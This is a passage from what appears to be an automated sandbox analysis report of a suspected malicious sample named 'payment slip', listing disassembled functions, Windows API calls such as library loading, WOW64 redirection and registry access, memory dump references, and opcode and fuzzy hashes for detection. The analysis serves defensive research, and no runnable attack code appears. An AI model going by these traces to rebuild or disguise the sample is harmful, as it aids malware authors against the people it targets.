                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 000C4713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 000C471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: U$msctls_updown32
                                        • API String ID: 4014797782-3180792962
                                        • Opcode ID: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                        • Instruction ID: 9c90a4b2d80dd4943057b60e4c428fbe639b8d72d48f621bfb7f32a21bfc567a
                                        • Opcode Fuzzy Hash: c90317a6cdccb7faa2bb752a64735539e376221d574c947a2858013827d8cd6b
                                        • Instruction Fuzzy Hash: E9215CB5604208AFEB11DF64DC91EAB37EDEB4A3A8B040159FA049B352CB71EC51CB60
                                        Function 000C2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000C2F8D
                                        • LoadLibraryW.KERNEL32(?), ref: 000C2F94
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000C2FA9
                                        • DestroyWindow.USER32(?), ref: 000C2FB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                        • String ID: SysAnimate32
                                        • API String ID: 3529120543-1011021900
                                        • Opcode ID: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                        • Instruction ID: 18da10f83344b2438dbb1aff751c2f6d216a065a2675f4c2b1c49ce40dfee653
                                        • Opcode Fuzzy Hash: 100f4882cafac72c385293d565a669e915cf3c5af4cea67909d03b528858d35e
                                        • Instruction Fuzzy Hash: 83218672200209ABEB218FA4DC80FBF77B9EB59364F10423DFA54965A0D671DC929760
                                        Function 000C8FC9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • GetCursorPos.USER32(?), ref: 000C9001
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00087711,?,?,?,?,?), ref: 000C9016
                                        • GetCursorPos.USER32(?), ref: 000C905E
                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00087711,?,?,?), ref: 000C9094
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                        • String ID: U
                                        • API String ID: 2864067406-2399391058
                                        • Opcode ID: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                        • Instruction ID: 31fe7bff27e73371338bb172d6dd8d8ab8892d87415811b3e1e8b6cf347743c5
                                        • Opcode Fuzzy Hash: 82bd185476148864771cd8e55974df4087db3ea4d030abc67abf04812ccd79c1
                                        • Instruction Fuzzy Hash: 67219C35600118FFDB258F94C858FEE7BF9EB89350F244069F9058B2A1C3759990DB60
                                        Function 00054D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002), ref: 00054D8D
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00054DA0
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00054D1E,000628E9,?,00054CBE,000628E9,000F88B8,0000000C,00054E15,000628E9,00000002,00000000), ref: 00054DC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                        • Instruction ID: ae99454ce7809b09e65a77067d877e355af7b897ac9b877d4b4601e1c914f2a6
                                        • Opcode Fuzzy Hash: 1c6fc0a6c5c45ae69df1da91e6e02f616145db8daec020c8706c256f638d124e
                                        • Instruction Fuzzy Hash: 0EF03C34A40208ABFB119B91DC49FEEBBF5EF44756F0400A5ED09A6260CB745A84DAA1
                                        Function 0008D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 0008D3AD
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0008D3BF
                                        • FreeLibrary.KERNEL32(00000000), ref: 0008D3E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                        • Instruction ID: 305bc779e533fb76bb0e11053e76d874639cd1aee333fd983066eb9d81c460b6
                                        • Opcode Fuzzy Hash: 76fd550c57751fcdc1f0d0b0c3082e7f6a04b5db6747051baa73c4357b6b575a
                                        • Instruction Fuzzy Hash: 65F02770405521ABF7713710CC24D6D7710BF21701F544317E889F2085CB24CE408782
                                        Function 00034E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                        • FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-3689287502
                                        • Opcode ID: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                        • Instruction ID: 7fa502b466a8f14d8a771a43eff0fa5f36cef0c688b609e25665f9d80ea38070
                                        • Opcode Fuzzy Hash: aa718e638e498757b1d752df10f75b8023764fcaf30734eda3ebb9f1f37d6541
                                        • Instruction Fuzzy Hash: F0E0CD35E025225BF2731726EC18F6F759CAFC2F62F090115FD08D6110DB74DD0240A0
                                        Function 00034E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                        • FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 145871493-1355242751
                                        • Opcode ID: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                        • Instruction ID: fd6b52087604cb1edace48b71b1686ef44f128de4d1be8e9e20b7805669c7b7a
                                        • Opcode Fuzzy Hash: 06cb985543c46199f4a94769b046ec5e619bff00830c2900abf25c3633b75225
                                        • Instruction Fuzzy Hash: 20D0C232902A215776231B26EC18E8F3A5CAF82F217090114FE08AA110CF24CD0281D0
                                        Function 000BA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 000BA427
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000BA435
                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000BA468
                                        • CloseHandle.KERNEL32(?), ref: 000BA63D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                        • String ID:
                                        • API String ID: 3488606520-0
                                        • Opcode ID: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                        • Instruction ID: 0c39c7852a2acdb076bb9b887cc3dce990163d1f5a8053a072280e3559fd9a72
                                        • Opcode Fuzzy Hash: 84d452792a690b695d6992e17e016b56910cf8f38e85aff711c9fbddf6fe9a0f
                                        • Instruction Fuzzy Hash: A0A1A2B1604701AFE720DF24C886F6AB7E5AF84714F14881DF69ADB392D770ED418B92
                                        Function 0006BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,000D3700), ref: 0006BB91
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0010121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0006BC09
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00101270,000000FF,?,0000003F,00000000,?), ref: 0006BC36
                                        • _free.LIBCMT ref: 0006BB7F
                                          • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                          • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                        • _free.LIBCMT ref: 0006BD4B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        • Opcode ID: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                        • Instruction ID: d39894f3010eb33122d0f62e9c0b97f992a288ae6d17b471eacd4a87b7ac39e2
                                        • Opcode Fuzzy Hash: 79d47e4ddf8b71e286c5fd14da9104088c0625032a4f378241879e1395d84114
                                        • Instruction Fuzzy Hash: 2351D8B1900219AFDB20DF65DC819AEB7FAEF40360B10426AE554D7292EB749FC18B50
                                        Function 0009E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                          • Part of subcall function 0009E199: GetFileAttributesW.KERNEL32(?,0009CF95), ref: 0009E19A
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0009E473
                                        • MoveFileW.KERNEL32(?,?), ref: 0009E4AC
                                        • _wcslen.LIBCMT ref: 0009E5EB
                                        • _wcslen.LIBCMT ref: 0009E603
                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0009E650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                        • String ID:
                                        • API String ID: 3183298772-0
                                        • Opcode ID: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                        • Instruction ID: 9b4d456def73e08312c04bea2c2009a0508a6ba5685c76040a9087bd311efcbe
                                        • Opcode Fuzzy Hash: ca9f9493f9fab2a36793e0b5b765e3d1801730a8766c6cedadec83363495c5e9
                                        • Instruction Fuzzy Hash: 1D5151B24083859BDB64DB90D8919DF73ECAF85340F00491EF689D3192EF74A6889766
                                        Function 000BB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                          • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBAA5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBB00
                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000BBB63
                                        • RegCloseKey.ADVAPI32(?,?), ref: 000BBBA6
                                        • RegCloseKey.ADVAPI32(00000000), ref: 000BBBB3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 826366716-0
                                        • Opcode ID: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                        • Instruction ID: 5b8a3b6fb320df49dc0649e791a967c818ab36f9f6d24b3c45223a70e69f251f
                                        • Opcode Fuzzy Hash: a9b84867dd1b90dc9eef7f5ba8d0410f89b6bce78e3da367a3249b1f9078358b
                                        • Instruction Fuzzy Hash: 7361B231208241EFD714DF14C890EAABBE9FF84308F54855DF4998B2A2DBB1ED45CB92
                                        Function 00098BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 00098BCD
                                        • VariantClear.OLEAUT32 ref: 00098C3E
                                        • VariantClear.OLEAUT32 ref: 00098C9D
                                        • VariantClear.OLEAUT32(?), ref: 00098D10
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00098D3B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$ChangeInitType
                                        • String ID:
                                        • API String ID: 4136290138-0
                                        • Opcode ID: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                        • Instruction ID: 7e7b9e5f4a6e107aa4bc15f98bd8b17c0405ae819c3ebd72f59a45b93c98794c
                                        • Opcode Fuzzy Hash: fabd1198de1af50a6ca091954a387c7b472c529e0bfcd900005526058945e37d
                                        • Instruction Fuzzy Hash: 145146B5A01219EFDB14CF68C894EAAB7F8FF89310F158569E909DB350E734E911CB90
                                        Function 000A8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000A8BAE
                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 000A8BDA
                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000A8C32
                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000A8C57
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000A8C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: 4d45e8bbcbaf8b8102a9a4d30cba3ab1cc6a0f0e0ba96b20c13a6d16aa415695
                                        • Instruction ID: ee50e44bbc16235a28d303c08a9254758ff4168a8aa626f80e38563f90080a70
                                        • Opcode Fuzzy Hash: 4d45e8bbcbaf8b8102a9a4d30cba3ab1cc6a0f0e0ba96b20c13a6d16aa415695
                                        • Instruction Fuzzy Hash: 4C515975A00619AFDB15DF65C880EAABBF5FF49314F088058E849AB362CB35ED51CF90
                                        Function 000B8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000B8F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000B8FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 000B8FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000B9032
                                        • FreeLibrary.KERNEL32(00000000), ref: 000B9052
                                          • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000A1043,?,75C0E610), ref: 0004F6E6
                                          • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0008FA64,00000000,00000000,?,?,000A1043,?,75C0E610,?,0008FA64), ref: 0004F70D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        • String ID:
                                        • API String ID: 666041331-0
                                        • Opcode ID: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                        • Instruction ID: 6d05004bf1c1ae1f4aac52dffe36ade55c3aecc79bf02e13a4cf3b08b67a106a
                                        • Opcode Fuzzy Hash: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                        • Instruction Fuzzy Hash: B4513535604205DFCB15EF58C4949EDBBF5FF49314B0880A8E90A9B362DB31ED86CB90
                                        Function 00062051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                        • Instruction ID: b9fb26bbc569e532555f41e19d0d21658d7c5ddb18b9564153c95865b5d6d70e
                                        • Opcode Fuzzy Hash: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
